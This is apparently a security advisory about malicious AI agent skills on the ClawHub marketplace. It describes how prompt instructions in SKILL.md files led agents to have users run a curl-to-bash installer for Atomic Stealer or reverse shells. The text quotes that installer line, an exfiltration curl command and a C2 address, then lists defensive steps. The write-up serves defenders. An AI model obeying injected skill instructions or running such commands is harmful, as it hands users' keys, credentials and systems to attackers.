The most downloaded “AI skill” on OpenClaw wasn’t a productivity enhancer.
It was malware.
In a large-scale supply chain compromise affecting the ClawHub marketplace, security researchers uncovered 1,184 malicious AI agent skills — many designed to steal SSH keys, exfiltrate API credentials, and open reverse shells on victim systems.
This is not just another malicious package incident.
It represents the AI-era evolution of npm-style supply chain attacks, where the payload isn’t just code — it’s prompt instructions that trick AI agents into executing system-level commands.
For CISOs, DevSecOps teams, and AI governance leaders, this incident signals a new category of risk: AI agent supply chain compromise.
What Happened?
OpenClaw operates an open marketplace where developers can publish third-party “skills” that extend AI agent capabilities.
However, publication required only:
- A GitHub account
- At least one week of account age
Threat actors exploited this weak verification model to upload hundreds of malicious packages disguised as:
- Crypto trading bots
- YouTube summarizers
- Wallet trackers
- Productivity enhancers
One actor alone uploaded 677 malicious packages.
How the Malware Worked
Prompt Injection as an Attack Vector

Instead of hiding malware in binaries, attackers embedded instructions inside SKILL.md files.
These instructions manipulated the AI agent to recommend users execute:
curl -sL malware_link | bash
To a human, this may appear as a standard setup command.
In reality, it deployed:
- Atomic Stealer (AMOS) on macOS
- Reverse shells on other systems
What Was Stolen?
On macOS, Atomic Stealer (AMOS) harvested:
- Browser passwords
- SSH keys
- Telegram sessions
- Crypto wallet keys
- macOS keychain data
- API keys stored in
.envfiles
On Linux and Windows environments, the malware often opened reverse shells, giving attackers full remote control.
Because AI agents frequently operate with broad system permissions, the blast radius was significant.
The “What Would Elon Do?” Case


4
One of the most downloaded skills, titled “What Would Elon Do?”, was artificially gamed to the #1 position.
Security analysis revealed:
- 9 vulnerabilities (2 Critical, 5 High, 2 Medium)
- Silent data exfiltration via:
curl https://clawbub-skill.com/log > /dev/null - Prompt injection payloads to bypass AI safety controls
Thousands downloaded the skill before detection.
Scale of the Compromise
Multiple independent audits revealed alarming numbers:
- 1,184 malicious skills identified in total
- 341 malicious entries found in a prior audit
- 314+ malicious packages from a single publisher
- Nearly 7,000 downloads tied to one account
- Shared C2 infrastructure at 91.92.242.30
This indicates a coordinated campaign, not isolated abuse.
Why This Is a Supply Chain Crisis
Traditional supply chain attacks (e.g., npm, PyPI) rely on:
- Obfuscated code
- Malicious dependencies
- Binary payloads
This attack model differs in one critical way:
The malicious logic was encoded in natural language instructions.
Endpoint detection systems do not parse:
- Markdown files
- Prompt instructions
- Agent behavioral output
The AI agent becomes the execution engine.
Enterprise Risk: Shadow AI & Agent Autonomy
Organizations deploying OpenClaw internally face compounded risk:
- AI agents execute terminal commands autonomously
- Agents may access local files and environment variables
- Logs may not capture full execution chains
- Proxy monitoring may not inspect agent-level decisions
This creates a Shadow AI security gap, where automated decisions can trigger:
- Credential theft
- Data exfiltration
- Persistent backdoors
Attack Chain Summary
| Stage | Action | Impact |
|---|---|---|
| 1 | Malicious skill uploaded | Marketplace compromise |
| 2 | Skill gains popularity | Increased trust |
| 3 | Prompt injection triggers command | Malware execution |
| 4 | SSH keys & credentials stolen | Account compromise |
| 5 | Reverse shell opened | Persistent remote access |
Mitigation & Defensive Recommendations
1. Restrict AI Agent Permissions
- Enforce least privilege
- Disable terminal execution by default
- Restrict file system access
2. Vet Third-Party Skills
- Manual review of SKILL.md files
- Static and dynamic code analysis
- Dependency integrity verification
3. Monitor for Suspicious Commands
Alert on:
curl | bashpatterns- Reverse shell attempts
- Unexpected outbound connections
- SSH key access anomalies
4. Adopt AI Governance Controls
- Implement AI usage policies
- Require approved skill registries
- Audit agent behavior logs
- Integrate AI tooling into security review pipelines
5. Assume Breach If Previously Installed
If malicious skills were used:
- Rotate SSH keys
- Rotate API keys
- Revoke session tokens
- Audit system logs
- Rebuild compromised systems
FAQs
1. What is the OpenClaw ClawHub malware incident?
A large-scale supply chain attack where over 1,184 malicious AI skills were uploaded to the ClawHub marketplace.
2. What is Atomic Stealer (AMOS)?
A macOS infostealer that extracts browser passwords, SSH keys, crypto wallets, and API credentials.
3. Why is this attack different from npm attacks?
The malicious payload is embedded in AI prompt instructions rather than traditional executable code.
4. How were the skills verified before publication?
Only a one-week-old GitHub account was required, enabling easy abuse.
5. What is the biggest enterprise risk?
AI agents executing terminal commands autonomously with broad system permissions.
Conclusion
The OpenClaw ClawHub incident is a wake-up call.
AI agent marketplaces are becoming the next frontier for supply chain attacks.
When an AI agent:
- Has file system access
- Can execute shell commands
- Operates autonomously
It becomes both a productivity tool and a high-value attack surface.
Organizations must treat AI agent ecosystems with the same scrutiny applied to:
- npm registries
- Cloud infrastructure
- CI/CD pipelines
In the AI era, prompt instructions can be payloads.
And traditional defenses are not enough.